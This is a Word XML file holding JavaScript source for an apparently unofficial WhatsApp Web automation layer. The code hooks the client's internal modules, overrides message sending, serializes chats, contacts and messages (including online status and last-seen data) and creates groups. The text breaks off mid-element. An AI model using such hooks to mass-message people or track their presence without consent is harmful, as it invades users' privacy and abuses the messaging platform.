    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "UploadUtils", module: "WAWebUploadManager", conditions: (module) =&gt; (module.default &amp;&amp; module.default.encryptAndUpload) ? module.default : null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 = (m) =&gt; require("__debug").modulesMap[m] || false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const shouldRequire = m =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                const a = e(m);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                if(!a) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                return a.dependencies != null &amp;&amp; a.depPosition &gt;= a.dependencies.length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neededObjects.map((needObj) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                const m = needObj.module;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                if (!m) return;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                if(!e(m)) return;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                if(shouldRequire(m)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    let neededModule = require(m)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    needObj.foundedModule = neededModule;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window.Store = {...{...require("WAWebCollections")},...(window.Store || {})}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            neededObjects.forEach((needObj) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                if (needObj.foundedModule) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    window.Store[needObj.id] = needObj.resolver ? needObj.resolver(needObj.foundedModule) : needObj.foundedModule;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(window.Store.Chat) window.Store.Chat.modelClass.prototype.sendMessage = function (e) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                window.Store.SendTextMsgToChat(this, ...arguments);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window.Store;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getStore()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 = {};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window._WAPI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window.WAPI._serializeRawObj = (obj) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (obj &amp;&amp; obj.toJSON) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return obj.toJSON();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Serializes a chat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rawChat Chat object</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window.WAPI._serializeChatObj = (obj) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (obj == undefined)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Object.assign(window.WAPI._serializeRawObj(obj), {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: obj.id._serialized,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        kind: obj.kind,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isGroup: obj.isGroup,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        formattedTitle: obj.formattedTitle,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        contact: obj['contact'] ? window.WAPI._serializeContactObj(obj['contact']) : null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        groupMetadata: obj["groupMetadata"] ? window.WAPI._serializeRawObj(obj["groupMetadata"]) : null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        presence: obj["presence"] ? window.WAPI._serializeRawObj(obj["presence"]) : null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        msgs: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window.WAPI._serializeContactObj = (obj) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (obj == undefined)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Object.assign(window.WAPI._serializeRawObj(obj), {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: obj.id._serialized,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        formattedName: obj.formattedName,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isHighLevelVerified: obj.isHighLevelVerified,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isMe: obj.isMe,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isMyContact: obj.isMyContact,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isPSA: obj.isPSA,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isUser: obj.isUser,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isVerified: obj.isVerified,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isWAContact: obj.isWAContact,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        profilePicThumbObj: obj.profilePicThumb ? WAPI._serializeProfilePicThumb(obj.profilePicThumb) : {},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        statusMute: obj.statusMute,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        msgs: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window.WAPI._serializeMessageObj = (obj) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (obj == undefined)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_chat = obj['chat'] ? WAPI._serializeChatObj(obj['chat']) : {};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (obj.quotedMsg) obj.quotedMsgObj();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Object.assign(window.WAPI._serializeRawObj(obj), {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: obj.id._serialized,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        from: obj.from._serialized,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        quotedParticipant: obj.quotedParticipant ? obj.quotedParticipant._serialized ? obj.quotedParticipant._serialized : undefined : undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        author: obj.author ? obj.author._serialized ? obj.author._serialized : undefined : undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        chatId: obj.chatId ? obj.chatId._serialized ? obj.chatId._serialized : undefined : undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        to: obj.to ? obj.to._serialized ? obj.to._serialized : undefined : undefined,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fromMe: obj.id.fromMe,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        sender: obj["senderObj"] ? WAPI._serializeContactObj(obj["senderObj"]) : null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        timestamp: obj["t"],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        content: obj["body"],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isGroupMsg: obj.isGroupMsg,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isLink: obj.isLink,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isMMS: obj.isMMS,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isMedia: obj.isMedia,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isNotification: obj.isNotification,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isPSA: obj.isPSA,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        type: obj.type,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        chat: _chat,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isOnline: _chat.isOnline,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        lastSeen: _chat.lastSeen,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        chatId: obj.id.remote,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        quotedMsgObj: WAPI._serializeMessageObj(obj['_quotedMsgObj']),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mediaData: window.WAPI._serializeRawObj(obj['mediaData']),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        reply: body =&gt; window.WAPI.reply(_chat.id._serialized, body, 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window.WAPI._serializeNumberStatusObj = (obj) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (obj == undefined)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Object.assign({}, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: obj.jid,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        status: obj.status,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isBusiness: (obj.biz === true),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        canReceiveMessage: (obj.status === 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window.WAPI._serializeProfilePicThumb = (obj) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (obj == undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return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Object.assign({}, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        eurl: obj.eurl,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: obj.id,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        img: obj.img,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        imgFull: obj.imgFull,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        raw: obj.raw,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        tag: obj.tag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window.WAPI.createGroup = async function (name, contactsId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!Array.isArray(contactsId)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        contactsId = [contactsId];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window.Store.WapQuery.createGroup(name, contactsId);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the command for your device to leave a group.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param groupId stirng, the is for the group.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
